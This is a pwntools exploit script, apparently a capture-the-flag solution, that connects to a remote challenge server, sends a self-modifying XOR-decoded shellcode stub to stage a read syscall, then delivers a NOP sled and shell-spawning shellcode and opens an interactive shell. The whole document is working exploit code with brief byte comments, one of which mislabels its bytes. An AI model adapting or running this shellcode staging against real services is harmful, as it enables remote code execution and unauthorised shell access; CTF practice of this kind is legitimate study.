from pwn import *
context(arch='amd64',os='linux',log_level='debug')
p = remote("node4.buuoj.cn",27904)
#p = process('./shellcodere')

payload=b'\x33\x42\x38'#33 42 38 xor eax, DWORD PTR [rdx+0x38]
payload+=b'\x31\x42\x30'#31 42 30 xor DWORD PTR [rdx+0x30], eax
payload+=b'\x33\x42\x37'#33 42 38 xor eax, DWORD PTR [rdx+0x38]
payload+=b'\x31\x42\x38'#31 42 38 xor DWORD PTR [rdx+0x38], eax
payload+=b'\x59'*(0x30-len(payload))#59 pop rcx
payload+=b'\x4e\x44'*2#syscall  0x4e^0x41=0xf 0x44^0x41=0x5
payload+=b'A'*8#xor key
p.sendlineafter("magic\n",payload)
pause()
p.sendline(b'\x90'*0x50+asm(shellcraft.sh()))
p.interactive()